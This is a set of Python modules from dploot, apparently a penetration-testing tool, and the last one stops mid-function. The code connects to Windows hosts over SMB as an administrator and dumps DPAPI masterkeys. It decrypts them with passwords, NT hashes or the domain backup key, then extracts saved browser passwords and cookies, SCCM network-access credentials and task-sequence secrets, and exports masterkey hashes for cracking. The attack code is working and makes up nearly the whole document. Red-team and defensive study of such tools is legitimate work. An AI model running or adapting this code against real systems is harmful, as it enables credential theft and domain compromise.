import argparse
from binascii import unhexlify
import logging
import sys
from typing import Callable, Tuple

from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target, add_target_argument_group
from dploot.lib.utils import dump_looted_files_to_disk, handle_outputdir_option
from dploot.triage.masterkeys import MasterkeysTriage


NAME = "machinemasterkeys"


class MachineMasterkeysAction:
    def __init__(self, options: argparse.Namespace) -> None:
        self.options = options

        self.target = Target.from_options(options)

        self.conn = None
        self._is_admin = None
        self.outputfile = None
        self.outputdir = None
        
        self.dpapi_system_key = {}
        if self.options.dpapi_system_key is not None and self.options.dpapi_system_key != "":
            correl_table = {"dpapi_machinekey":"MachineKey","dpapi_userkey":"UserKey"}
            self.dpapi_system_key = {correl_table[k] :unhexlify(v[2:]) for k, v in (elem.split(":") for elem in options.dpapi_system_key.split(","))}

        self.outputdir = handle_outputdir_option(directory=self.options.export_dir)

        if self.options.outputfile is not None and self.options.outputfile != "":
            self.outputfile = self.options.outputfile

    def connect(self) -> None:
        self.conn = DPLootSMBConnection(self.target)
        if self.conn.connect() is None:
            logging.error("Could not connect to %s" % self.target.address)
            sys.exit(1)

    def run(self) -> None:
        self.connect()
        logging.info(
            "Connected to {} as {}\\{} {}\n".format(
                self.target.address,
                self.target.domain,
                self.target.username,
                ("(admin)" if self.is_admin else ""),
            )
        )
        if self.is_admin:
            fd = (
                open(self.outputfile + ".mkf", "a+")
                if self.outputfile is not None
                else None
            )

            def masterkey_callback(masterkey):
                masterkey.dump()
                if fd is not None:
                    fd.write(str(masterkey) + "\n")

            triage = MasterkeysTriage(
                target=self.target,
                conn=self.conn,
                per_masterkey_callback=masterkey_callback,
                dpapiSystem=self.dpapi_system_key
            )
            logging.info("Triage SYSTEM masterkeys\n")
            triage.triage_system_masterkeys()
            if self.outputfile is not None:
                logging.critical("Writting masterkeys to %s.mkf" % self.outputfile)
                fd.close()
            if self.outputdir is not None:
                dump_looted_files_to_disk(self.outputdir, triage.looted_files)
        else:
            logging.info("Not an admin, exiting...")

    @property
    def is_admin(self) -> bool:
        if self._is_admin is not None:
            return self._is_admin

        self._is_admin = self.conn.is_admin()
        return self._is_admin


def entry(options: argparse.Namespace) -> None:
    a = MachineMasterkeysAction(options)
    a.run()


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(
        NAME, help="Dump system masterkey from local or remote target"
    )

    group = subparser.add_argument_group("machinemasterkeys options")

    group.add_argument(
        "-outputfile",
        action="store",
        help=("Export keys to file"),
    )

    group.add_argument(
        "-dpapi-system-key",
        action="store",
        metavar="dpapi_machinekey:0x0123456789abcdef0123456789abcdef01234567,dpapi_userkey:0x0123456789abcdef0123456789abcdef01234567",
        help=("Use custom DPAPI SYSTEM keys"),
    )

    add_target_argument_group(subparser)

    return NAME, entry



import logging
from typing import Any, Dict, List, Optional
from Cryptodome.Cipher import AES, PKCS1_v1_5
from Cryptodome.PublicKey import RSA
from binascii import hexlify, unhexlify

from Cryptodome.Util.Padding import unpad
from Cryptodome.Hash import HMAC

from impacket.uuid import bin_to_string
from impacket.dpapi import (
    MasterKeyFile,
    MasterKey,
    DomainKey,
    DPAPI_BLOB,
    CREDENTIAL_BLOB,
    VAULT_VCRD,
    VAULT_VPOL,
    VAULT_KNOWN_SCHEMAS,
    VAULT_VPOL_KEYS,
    PVK_FILE_HDR,
    PRIVATE_KEY_BLOB,
    ALGORITHMS_DATA,
    privatekeyblob_to_pkcs1,
    DPAPI_DOMAIN_RSA_MASTER_KEY,
    CredentialFile,
)

from dploot.lib.crypto import (
    PRIVATE_KEY_RSA,
    PVKFile,
    PVKFile_SIG,
    PVKHeader,
    deriveKeysFromUser,
    deriveKeysFromUserkey,
    pvkblob_to_pkcs1,
)


def decrypt_masterkey(
    masterkey: bytes,
    domain_backupkey: Optional[bytes] = None,
    dpapi_systemkey: Optional[Dict] = None,
    sid: str = "",
    password: Optional[str] = None,
    nthash: Optional[str] = None,
) -> Any:
    if (
        domain_backupkey is None
        and password is None
        and nthash is None
        and dpapi_systemkey is None
    ):
        return None
    data = masterkey
    mkf = MasterKeyFile(data)
    dk = mk = bkmk = None
    data = data[len(mkf) :]
    if mkf["MasterKeyLen"] > 0:
        mk = MasterKey(data[: mkf["MasterKeyLen"]])
        data = data[len(mk) :]

    if mkf["BackupKeyLen"] > 0:
        bkmk = MasterKey(data[: mkf["BackupKeyLen"]])
        data = data[len(bkmk) :]

    if mkf["DomainKeyLen"] > 0:
        dk = DomainKey(data[: mkf["DomainKeyLen"]])
        data = data[len(dk) :]

    if domain_backupkey is not None and dk is not None:
        key = PRIVATE_KEY_BLOB(domain_backupkey[len(PVK_FILE_HDR()) :])
        private = privatekeyblob_to_pkcs1(key)
        cipher = PKCS1_v1_5.new(private)

        decryptedKey = cipher.decrypt(dk["SecretData"][::-1], None)
        if decryptedKey:
            domain_master_key = DPAPI_DOMAIN_RSA_MASTER_KEY(decryptedKey)
            return domain_master_key["buffer"][: domain_master_key["cbMasterKey"]]

    if sid != "":
        if nthash is not None:
            nthash = unhexlify(nthash)
            key1, key2 = deriveKeysFromUserkey(sid, nthash)
            decryptedKey = mk.decrypt(key2) or mk.decrypt(key1)
            if decryptedKey:
                return decryptedKey

        if password is not None:
            key1, key2, key3 = deriveKeysFromUser(sid, password)
            decryptedKey = mk.decrypt(key3) or mk.decrypt(key2) or mk.decrypt(key1)
            if decryptedKey:
                return decryptedKey

    if dpapi_systemkey is not None:
        decryptedKey = (
            mk.decrypt(dpapi_systemkey["UserKey"])
            or mk.decrypt(dpapi_systemkey["MachineKey"])
            or bkmk.decrypt(dpapi_systemkey["UserKey"])
            or bkmk.decrypt(dpapi_systemkey["MachineKey"])
        )
        if decryptedKey:
            return decryptedKey

        if sid != "":
            test = dpapi_systemkey["UserKey"]
            key1, key2 = deriveKeysFromUserkey(sid, test)
            if key2 is not None:
                decryptedKey = mk.decrypt(key2)
                if decryptedKey:
                    return decryptedKey

            decryptedKey = mk.decrypt(key1)
            if decryptedKey:
                return decryptedKey

            if key2 is not None:
                decryptedKey = bkmk.decrypt(key2)
                if decryptedKey:
                    return decryptedKey

            decryptedKey = bkmk.decrypt(key1)
            if decryptedKey:
                return decryptedKey
    return None


def decrypt_credential(credential_bytes: bytes, masterkey: MasterKey) -> Any:
    cred = CredentialFile(credential_bytes)
    decrypted = decrypt_blob(cred["Data"], masterkey)
    if decrypted:
        return CREDENTIAL_BLOB(decrypted)
    return None


def find_masterkey_for_credential_blob(
    credential_bytes: bytes, masterkeys: Any
) -> "Any | None":
    cred = CredentialFile(credential_bytes)
    return find_masterkey_for_blob(cred["Data"], masterkeys=masterkeys)


def decrypt_privatekey(
    privatekey_bytes: bytes, masterkey: Any
) -> RSA.RsaKey:
    blob = PVKHeader(privatekey_bytes)
    blob = PVKFile_SIG(privatekey_bytes) if blob["SigHeadLen"] > 0 else PVKFile(privatekey_bytes)
    key = unhexlify(masterkey.sha1)
    decrypted = decrypt(blob["Blob"], key)
    rsa_temp = PRIVATE_KEY_RSA(decrypted)
    return pvkblob_to_pkcs1(rsa_temp)


def find_masterkey_for_privatekey_blob(
    privatekey_bytes: bytes, masterkeys: List[Any]
) -> "Any | None":
    blob = PVKHeader(privatekey_bytes)
    if len(blob["Remaining"]) == 0:
        return None
    blob = PVKFile_SIG(privatekey_bytes) if blob["SigHeadLen"] > 0 else PVKFile(privatekey_bytes)

    masterkey = bin_to_string(blob["Blob"]["GuidMasterKey"])
    return find_masterkey(masterkey=masterkey, masterkeys=masterkeys)


def decrypt_vpol(vpol_bytes: bytes, masterkey: Any) -> "VAULT_VPOL_KEYS | None":
    vpol = VAULT_VPOL(vpol_bytes)
    blob = vpol["Blob"]

    key = unhexlify(masterkey.sha1)
    decrypted = decrypt(blob, key)
    if decrypted:
        return VAULT_VPOL_KEYS(decrypted)
    return None


def decrypt_vcrd(vcrd_bytes: bytes, vpol_keys: List[bytes]) -> Any:
    blob = VAULT_VCRD(vcrd_bytes)

    for key in vpol_keys:
        key = unhexlify(key)
        cleartext = None
        for i, entry in enumerate(blob.attributesLen):
            try:
                if entry > 28:
                    attribute = blob.attributes[i]
                    cipher = AES.new(key, AES.MODE_CBC, iv=attribute["IV"]) if "IV" in attribute.fields and len(attribute["IV"]) == 16 else AES.new(key, AES.MODE_CBC)
                    cleartext = cipher.decrypt(attribute["Data"])
                    if cleartext is not None:
                        # Lookup schema Friendly Name and print if we find one
                        if (
                            blob["FriendlyName"].decode("utf-16le")[:-1]
                            in VAULT_KNOWN_SCHEMAS
                        ):
                            # Found one. Cast it and print
                            return VAULT_KNOWN_SCHEMAS[
                                blob["FriendlyName"].decode("utf-16le")[:-1]
                            ](cleartext)
                        else:
                            # otherwise
                            return cleartext
            except Exception as e:
                if (
                    str(e)
                    != "('unpack requires a buffer of 4 bytes', \"When unpacking field 'Id2 | <L=0 | b''[:4]'\")"
                ):
                    logging.debug(e)
    return None


def find_masterkey_for_vpol_blob(vault_bytes: bytes, masterkeys: Any) -> "Any | None":
    vault = VAULT_VPOL(vault_bytes)
    blob = vault["Blob"]
    masterkey = bin_to_string(blob["GuidMasterKey"])
    return find_masterkey(masterkey=masterkey, masterkeys=masterkeys)


def decrypt_blob(blob_bytes: bytes, masterkey: Any, entropy=None) -> "bytes | None":
    blob = DPAPI_BLOB(blob_bytes)
    # Ugly fix below:
    # if blob_bytes was too long, strip blob.rawData so its len matches len(blob)
    if len(blob.rawData) > len(blob):
        logging.debug(
            f"{__name__}.decrypt_blob(): rawData too long. Stripping {len(blob.rawData) - len(blob)} bytes."
        )
        blob.rawData = blob.rawData[0 : len(blob)]
    key = unhexlify(masterkey.sha1)
    return decrypt(blob, key, entropy=entropy) if entropy is not None else decrypt(blob, key)


def decrypt(blob: DPAPI_BLOB, keyHash, entropy=None) -> "bytes | None":
    hash_algo = ALGORITHMS_DATA[blob["HashAlgo"]][1]
    block_size = hash_algo.block_size
    for algo in [compute_sessionKey_1, compute_sessionKey_2]:
        sessionKey = algo(keyHash, blob["Salt"], hash_algo, block_size, entropy)
        sessionKey = sessionKey.digest()
        derivedKey = blob.deriveKey(sessionKey)
        crypto = ALGORITHMS_DATA[blob["CryptAlgo"]]
        cipher = crypto[1].new(
            derivedKey[: crypto[0]], mode=crypto[2], iv=b"\x00" * crypto[3]
        )
        cleartext = cipher.decrypt(blob["Data"])
        try:
            cleartext = unpad(cleartext, crypto[1].block_size)
        except ValueError as e:
            if "Padding is incorrect" in str(e):
                pass
        # Now check the signature
        # ToDo Fix this, it's just ugly, more testing so we can remove one
        toSign = blob.rawData[20 : len(blob) - len(blob["Sign"]) - 4]
        if toSign[-4:] != blob["Data"][-4:]:
            logging.debug(f"{__name__}.decrypt(): toSign is wrong!")
            logging.debug("toSign           : %s" % (hexlify(toSign)))
            logging.debug(
                "Sign (%2d)      : %s" % (len(blob["Sign"]), hexlify(blob["Sign"]))
            )

        hmac_calculated = algo(keyHash, blob["HMac"], hash_algo, block_size, entropy)
        hmac_calculated.update(toSign)
        if blob["Sign"] == hmac_calculated.digest():
            return cleartext

    return None


def compute_sessionKey_1(
    key_hash: bytes, salt: bytes, hash_algo: object, block_size: int, entropy: bytes
):
    pad_block = key_hash.ljust(block_size, b"\x00")
    ipad = bytearray(i ^ 0x36 for i in pad_block)
    opad = bytearray(i ^ 0x5C for i in pad_block)

    a = hash_algo.new(ipad)
    a.update(salt)

    computed_key = hash_algo.new(opad)
    computed_key.update(a.digest())

    if entropy is not None:
        computed_key.update(entropy)
    return computed_key


def compute_sessionKey_2(
    key_hash: bytes, salt: bytes, hash_algo: object, block_size: int, entropy: bytes
):
    computed_key = HMAC.new(key_hash, salt, hash_algo)
    if entropy is not None:
        computed_key.update(entropy)

    return computed_key


def find_masterkey_for_blob(blob_bytes: bytes, masterkeys: Any) -> "Any | None":
    blob = DPAPI_BLOB(blob_bytes)
    masterkey = bin_to_string(blob["GuidMasterKey"])
    return find_masterkey(masterkey=masterkey, masterkeys=masterkeys)


def find_masterkey(masterkey: str, masterkeys: Any) -> "Any | None":
    masterkey = masterkey.lower()
    return next((key for key in masterkeys if key.guid.lower() == masterkey), None)



import argparse
import logging
import sys
from typing import Callable, Tuple
from dploot.action.masterkeys import (
    add_masterkeys_argument_group,
    parse_masterkeys_options,
)

from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target, add_target_argument_group
from dploot.lib.utils import dump_looted_files_to_disk, handle_outputdir_option
from dploot.triage.browser import BrowserTriage, Cookie
from dploot.triage.cng import CngTriage
from dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file

NAME = "browser"


class BrowserAction:
    def __init__(self, options: argparse.Namespace) -> None:
        self.options = options
        self.target = Target.from_options(options)

        self.conn = None
        self._is_admin = None
        self.outputdir = None
        self.masterkeys = None
        self.pvkbytes = None
        self.passwords = None
        self.nthashes = None

        self.outputdir = handle_outputdir_option(directory=self.options.export_dir)

        if self.options.mkfile is not None:
            try:
                self.masterkeys = parse_masterkey_file(self.options.mkfile)
            except Exception as e:
                logging.error(str(e))
                sys.exit(1)

        self.pvkbytes, self.passwords, self.nthashes = parse_masterkeys_options(
            self.options, self.target
        )

    def connect(self) -> None:
        self.conn = DPLootSMBConnection(self.target)
        if self.conn.connect() is None:
            logging.error("Could not connect to %s" % self.target.address)
            sys.exit(1)

    def run(self) -> None:
        self.connect()
        logging.info(
            "Connected to {} as {}\\{} {}\n".format(
                self.target.address,
                self.target.domain,
                self.target.username,
                ("(admin)" if self.is_admin else ""),
            )
        )
        if self.is_admin:
            if self.masterkeys is None:

                def masterkey_triage(masterkey):
                    masterkey.dump()

                masterkeytriage = MasterkeysTriage(
                    target=self.target,
                    conn=self.conn,
                    pvkbytes=self.pvkbytes,
                    nthashes=self.nthashes,
                    passwords=self.passwords,
                    per_masterkey_callback=masterkey_triage
                    if not self.options.quiet
                    else None,
                )
                logging.info("Triage ALL USERS masterkeys\n")
                self.masterkeys = masterkeytriage.triage_masterkeys()
                if self.options.v20support:
                    self.masterkeys += masterkeytriage.triage_system_masterkeys()
                print()
                if self.outputdir is not None:
                    dump_looted_files_to_disk(self.outputdir, masterkeytriage.looted_files)

            if self.options.kill_browser:
                logging.info("Killing browsers")
                for browser_process_name in ["chrome.exe", "msedge.exe", "brave.exe"]:
                    self.conn.perform_taskkill(process_name=browser_process_name)

            def secret_callback(secret):
                if not self.options.show_cookies and isinstance(secret, Cookie):
                    return
                if self.options.quiet:
                    secret.dump_quiet()
                else:
                    secret.dump()

            cng_chromekey = None

            if self.options.v20support:
                triage = CngTriage(
                    target=self.target,
                    conn=self.conn,
                    masterkeys=self.masterkeys,
                )
                logging.info("Triage SYSTEM CNG files\n")

                for cng_file in triage.triage_system_cng():
                    if cng_file.cng_blob["Name"].decode("utf-16le").rstrip("\0") == "Google Chromekey1":
                            logging.info("Found CNG Google ChromeKey1\n")
                            cng_chromekey = cng_file.decrypted_private_key

            triage = BrowserTriage(
                target=self.target,
                conn=self.conn,
                masterkeys=self.masterkeys,
                per_secret_callback=secret_callback,
            )
            logging.info(
                "Triage Browser Credentials%sfor ALL USERS\n"
                % (" and Cookies " if self.options.show_cookies else " ")
            )
            triage.triage_browsers(
                gather_cookies=self.options.show_cookies,
                cng_chromekey=cng_chromekey,
                bypass_shared_violation=self.options.bypass_shared_violation,
            )
            if self.outputdir is not None:
                dump_looted_files_to_disk(self.outputdir, triage.looted_files)
        else:
            logging.info("Not an admin, exiting...")

    @property
    def is_admin(self) -> bool:
        if self._is_admin is not None:
            return self._is_admin

        self._is_admin = self.conn.is_admin()
        return self._is_admin


def entry(options: argparse.Namespace) -> None:
    a = BrowserAction(options)
    a.run()


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(
        NAME,
        help="Dump users credentials and cookies saved in browser from local or remote target",
    )

    group = subparser.add_argument_group("browser options")

    group.add_argument(
        "-mkfile",
        action="store",
        help=("File containing {GUID}:SHA1 masterkeys mappings"),
    )

    add_masterkeys_argument_group(group)

    group.add_argument(
        "-show-cookies",
        action="store_true",
        help=("Output dumped cookies from browsers"),
    )

    group.add_argument(
        "-bypass-shared-violation",
        action="store_true",
        help=("Will try to bypass Shared Violation Error with a silly esentutl trick"),
    )

    group.add_argument(
        "-v20support",
        action="store_true",
        help=("Will dump v20 chromium credentials (will perform a LSA dump in form of reg save)"),
    )

    group.add_argument(
        "-kill-browser",
        action="store_true",
        help=(
            "Will try to kill browser's process. Usefull when Shared Violation Error"
        ),
    )

    add_target_argument_group(subparser)

    return NAME, entry



import argparse
import logging
import sys
from typing import Callable, Dict, Tuple

from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target, add_target_argument_group
from dploot.lib.utils import dump_looted_files_to_disk, handle_outputdir_option, parse_file_as_dict
from dploot.triage.masterkeys import MasterkeysTriage


NAME = "masterkeys"


class MasterkeysAction:
    def __init__(self, options: argparse.Namespace) -> None:
        self.options = options

        self.target = Target.from_options(options)

        self.conn = None
        self._is_admin = None
        self.outputfile = None
        self.pvkbytes = None
        self.passwords = None
        self.nthashes = None
        self.outputdir = None

        self.outputdir = handle_outputdir_option(directory=self.options.export_dir)

        if self.options.outputfile is not None and self.options.outputfile != "":
            self.outputfile = self.options.outputfile

        self.pvkbytes, self.passwords, self.nthashes = parse_masterkeys_options(
            self.options, self.target
        )

    def connect(self) -> None:
        self.conn = DPLootSMBConnection(self.target)
        if self.conn.connect() is None:
            logging.error("Could not connect to %s" % self.target.address)
            sys.exit(1)

    def run(self) -> None:
        self.connect()
        logging.info(
            "Connected to {} as {}\\{} {}\n".format(
                self.target.address,
                self.target.domain,
                self.target.username,
                ("(admin)" if self.is_admin else ""),
            )
        )
        if self.is_admin:
            fd = (
                open(self.outputfile + ".mkf", "a+")
                if self.outputfile is not None
                else None
            )

            def masterkey_callback(masterkey):
                if masterkey.key is not None:
                    masterkey.dump()
                    if fd is not None:
                        fd.write(str(masterkey) + "\n")

            triage = MasterkeysTriage(
                target=self.target,
                conn=self.conn,
                pvkbytes=self.pvkbytes,
                nthashes=self.nthashes,
                passwords=self.passwords,
                per_masterkey_callback=masterkey_callback,
            )
            logging.info("Triage ALL USERS masterkeys\n")
            triage.triage_masterkeys()
            if self.outputfile is not None:
                logging.critical("Writting masterkeys to %s" % self.outputfile)
                fd.close()
            if self.options.hashes_outputfile:
                print()
                with open(self.options.hashes_outputfile, "a+") as hashes_fd:
                    for mkhash in [mkhash for masterkey in triage.all_looted_masterkeys for mkhash in masterkey.generate_hash() ]:
                        print(mkhash)
                        hashes_fd.write(mkhash + "\n")
                    print()
                    logging.critical("Writting masterkey hashes to %s" % self.options.hashes_outputfile)
            if self.outputdir is not None:
                dump_looted_files_to_disk(self.outputdir, triage.looted_files)
        else:
            logging.info("Not an admin, exiting...")

    @property
    def is_admin(self) -> bool:
        if self._is_admin is not None:
            return self._is_admin

        self._is_admin = self.conn.is_admin()
        return self._is_admin


def entry(options: argparse.Namespace) -> None:
    a = MasterkeysAction(options)
    a.run()


def parse_masterkeys_options(
    options: argparse.Namespace, target: Target
) -> Tuple[bytes, Dict[str, str], Dict[str, str]]:
    pvkbytes = None
    passwords = {}
    nthashes = {}
    if hasattr(options, "pvk") and options.pvk is not None:
        try:
            pvkbytes = open(options.pvk, "rb").read()
        except Exception as e:
            logging.error(str(e))
            sys.exit(1)

    if hasattr(options, "passwords") and options.passwords is not None:
        try:
            passwords = parse_file_as_dict(options.passwords)
        except Exception as e:
            logging.error(str(e))
            sys.exit(1)

    if hasattr(options, "nthashes") and options.nthashes is not None:
        try:
            nthashes = parse_file_as_dict(options.nthashes)
        except Exception as e:
            logging.error(str(e))
            sys.exit(1)

    if target.password is not None and target.password != "":
        if passwords is None:
            passwords = {}
        passwords[target.username] = target.password

    if target.nthash is not None and target.nthash != "":
        if nthashes is None:
            nthashes = {}
        nthashes[target.username] = target.nthash.lower()

    if nthashes is not None:
        nthashes = {k.lower(): v.lower() for k, v in nthashes.items()}

    if passwords is not None:
        passwords = {k.lower(): v for k, v in passwords.items()}

    return pvkbytes, passwords, nthashes


def add_masterkeys_argument_group(group: argparse._ArgumentGroup) -> None:
    group.add_argument(
        "-pvk",
        action="store",
        help=("Pvk file with domain backup key"),
    )

    group.add_argument(
        "-passwords",
        action="store",
        help=(
            "File containing username:password that will be used eventually to decrypt masterkeys"
        ),
    )

    group.add_argument(
        "-nthashes",
        action="store",
        help=(
            "File containing username:nthash that will be used eventually to decrypt masterkeys"
        ),
    )


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(
        NAME, help="Dump users masterkey from local or remote target"
    )

    group = subparser.add_argument_group("masterkeys options")

    add_masterkeys_argument_group(group)

    group.add_argument(
        "-outputfile",
        action="store",
        help=("Export keys to file"),
    )

    group.add_argument(
        "-hashes-outputfile",
        action="store",
        help=("Export hashes of masterkeys to file in Hashcat/JtR format"),
    )

    add_target_argument_group(subparser)

    return NAME, entry



import logging
from typing import List, Tuple, Callable
import re

from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.triage.masterkeys import Masterkey
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection


class SCCM:
    @classmethod
    def member_to_string(cls, member):
        return member.decode("utf-16le", errors="backslashreplace").rstrip("\0")

    def dump(self) -> None:
        print(self.description_header)
        for name, value in self.__dict__.items():
            print("\t%8s:\t%s" % (name.capitalize(), self.member_to_string(value)))

    def dump_quiet(self) -> None:
        print(
            f'{self.quiet_description_header} {":".join([self.member_to_string(_) for _ in self.__dict__.values()])}'
        )

    def __eq__(self, other) -> bool:
        return all(getattr(self, name) == getattr(other, name) for name in self.__dict__)

    def __hash__(self) -> int:
        return hash(tuple(self.__dict__.values()))


class SCCMCred(SCCM):
    description_header = "[NAA Account]"
    quiet_description_header = "[NAA]"

    def __init__(self, username: bytes, password: bytes) -> None:
        self.username = username
        self.password = password


class SCCMSecret(SCCM):
    description_header = "[Task sequences secret]"
    quiet_description_header = "[Task]"

    def __init__(self, secret) -> None:
        self.secret = secret


class SCCMCollection(SCCM):
    description_header = "[Collection Variable]"
    quiet_description_header = "[Collection]"

    def __init__(self, variable: bytes, value: bytes) -> None:
        self.variable = variable
        self.value = value


class SCCMTriage(Triage):
    sccm_objectdata_filepath = "Windows\\System32\\wbem\\Repository\\OBJECTS.DATA"
    share = "C$"

    regex_naa = rb"CCM_NetworkAccessAccount\x00\x00<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>\x00\x00<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>"
    regex_task = rb"</SWDReserved>.*?<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>"
    regex_collection = rb"CCM_CollectionVariable\x00\x00(.*?)\x00\x00.*?<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_secret_callback: Callable = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_secret_callback,
        )
        self.dcom_conn = None

    def decrypt_sccm_secret(self, dpapi_blob, from_wmi: bool = False):
        list_blob = [int(dpapi_blob[i:i + 2], 16) for i in range(0, len(dpapi_blob), 2)][4:] if from_wmi else list(bytes.fromhex(dpapi_blob.decode("utf-8")))[4:]
        blob_bytes = bytes(list_blob)

        masterkey = find_masterkey_for_blob(blob_bytes, masterkeys=self.masterkeys)
        result = ""
        if masterkey is not None:
            result = decrypt_blob(blob_bytes, masterkey=masterkey)
        else:
            logging.debug("Master keys not found for SCCM blob")
        return result

    def parse_sccm_objectfile(
        self, objectfile
    ) -> Tuple[List[SCCMCred], List[SCCMSecret], List[SCCMCollection]]:
        sccm_creds = []
        sccm_task_sequences = []
        sccm_collections = []

        logging.debug("Looking for NAA Credentials from OBJECTS.DATA file")
        pattern = re.compile(self.regex_naa)
        for match in pattern.finditer(objectfile):
            logging.debug(
                f"Found NAA Credentials from OBJECTS.DATA file: {match.start()} - {match.end()}"
            )
            password = self.decrypt_sccm_secret(match.group(1))
            username = self.decrypt_sccm_secret(match.group(2))
            sccm_cred = SCCMCred(username, password)
            sccm_creds.append(sccm_cred)
            if self.per_loot_callback is not None:
                self.per_loot_callback(sccm_cred)

        pattern = re.compile(self.regex_task)
        logging.debug("Looking for task sequences secret from OBJECTS.DATA file")
        for match in pattern.finditer(objectfile):
            logging.debug(
                f"Found task sequences secret from OBJECTS.DATA file: {match.start()} - {match.end()}"
            )
            task_seq = SCCMSecret(self.decrypt_sccm_secret(match.group(1)))
            sccm_task_sequences.append(task_seq)
            if self.per_loot_callback is not None:
                self.per_loot_callback(task_seq)

        pattern = re.compile(self.regex_collection)
        logging.debug("Looking for collection variables from OBJECTS.DATA file")
        for match in pattern.finditer(objectfile):
            try:
                logging.debug(
                    f"Found collection variable from OBJECTS.DATA file: {match.start()} - {match.end()}"
                )
                name = match.group(1).decode("utf-8").encode("utf-16le")
                value = self.decrypt_sccm_secret(match.group(2))
                sccm_collection = SCCMCollection(name, value)
                sccm_collections.append(sccm_collection)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(sccm_collection)
            except Exception as e:
                logging.debug(f"Exception encountered in {__name__}: {e}.")

        return sccm_creds, sccm_task_sequences, sccm_collections

    def parse_wmi_reply(self, iEnum):
        finding = []
        regex = r"<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>"
        while True:
            try:
                pEnum = iEnum.Next(0xFFFFFFFF, 1)[0]
                record = pEnum.getProperties()

                if (
                    "NetworkAccessUsername" in record
                    and "NetworkAccessPassword" in record
                    and len(record["NetworkAccessUsername"]["value"]) > 0
                    and len(record["NetworkAccessPassword"]["value"]) > 0
                ):
                    logging.debug("Found NAA Credentials using WMI")
                    username = self.decrypt_sccm_secret(
                        re.match(regex, record["NetworkAccessUsername"]["value"]).group(
                            1
                        ),
                        from_wmi=True,
                    )
                    password = self.decrypt_sccm_secret(
                        re.match(regex, record["NetworkAccessPassword"]["value"]).group(
                            1
                        ),
                        from_wmi=True,
                    )
                    sccm_naa = SCCMCred(username, password)
                    finding.append(sccm_naa)
                    if self.per_loot_callback is not None:
                        self.per_loot_callback(sccm_naa)

                if (
                    "Name" in record
                    and "Value" in record
                    and len(record["Name"]["value"]) > 0
                    and len(record["value"]["value"]) > 0
                ):
                    logging.debug("Found collection variables using WMI")
                    name = self.decrypt_sccm_secret(
                        re.match(regex, record["name"]["value"]).group(1), from_wmi=True
                    )
                    value = self.decrypt_sccm_secret(
                        re.match(regex, record["value"]["value"]).group(1),
                        from_wmi=True,
                    )
                    sccm_collection = SCCMCollection(name, value)
                    finding.append(sccm_collection)
                    if self.per_loot_callback is not None:
                        self.per_loot_callback(sccm_collection)

                if "TS_Sequence" in record and len(record["TS_Sequence"]["value"]) > 0:
                    logging.debug("Found task sequences secret using WMI")
                    secret = self.decrypt_sccm_secret(
                        re.match(regex, record["TS_Sequence"]["value"]).group(1),
                        from_wmi=True,
                    )
                    sccm_ts = SCCMSecret(secret)
                    finding.append(sccm_ts)
                    if self.per_loot_callback is not None:
                        self.per_loot_callback(sccm_ts)

            except Exception as e:
                if str(e).find("S_FALSE") > 0:
                    break
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    raise
                else:
                    break
        iEnum.RemRelease()
        return finding

    def wmi_collect_sccm_secrets(
        self,
    ) -> Tuple[List[SCCMCred], List[SCCMSecret], List[SCCMCollection]]:
        sccm_cred = []
        sccm_task = []
        sccm_collection = []
        namespace = "root\\ccm\\Policy\\Machine\\RequestedConfig"
        query_naa = "SELECT NetworkAccessUsername, NetworkAccessPassword FROM CCM_NetworkAccessAccount"
        query_task = "SELECT TS_Sequence FROM CCM_TaskSequence"
        query_collection = "SELECT Name, Value FROM CCM_CollectionVariable"
        try:
            self.dcom_conn = DCOMConnection(
                self.target.address,
                self.target.username,
                self.target.password,
                self.target.domain,
                self.target.lmhash,
                self.target.nthash,
                self.target.aesKey,
                oxidResolver=True,
                doKerberos=self.target.do_kerberos,
                kdcHost=self.target.dc_ip,
            )
            iInterface = self.dcom_conn.CoCreateInstanceEx(
                wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
            )
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            iWbemServices = iWbemLevel1Login.NTLMLogin(namespace, NULL, NULL)
            iWbemLevel1Login.RemRelease()

            logging.debug("Query WMI for Network access accounts")
            iEnumWbemClassObject = iWbemServices.ExecQuery(query_naa)
            sccm_cred = self.parse_wmi_reply(iEnumWbemClassObject)

            logging.debug("Query WMI for Task sequences")
            iEnumWbemClassObject = iWbemServices.ExecQuery(query_task)
            sccm_task = self.parse_wmi_reply(iEnumWbemClassObject)

            logging.debug("Query WMI for collection variables")
            iEnumWbemClassObject = iWbemServices.ExecQuery(query_collection)
            sccm_collection = self.parse_wmi_reply(iEnumWbemClassObject)

            iEnumWbemClassObject.RemRelease()
        except (Exception, KeyboardInterrupt) as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        finally:
            if self.dcom_conn is not None:
                self.dcom_conn.disconnect()
        return sccm_cred, sccm_task, sccm_collection

    def triage_sccm(
        self, use_wmi: bool
    ) -> Tuple[List[SCCMCred], List[SCCMSecret], List[SCCMCollection]]:
        sccm_cred = []
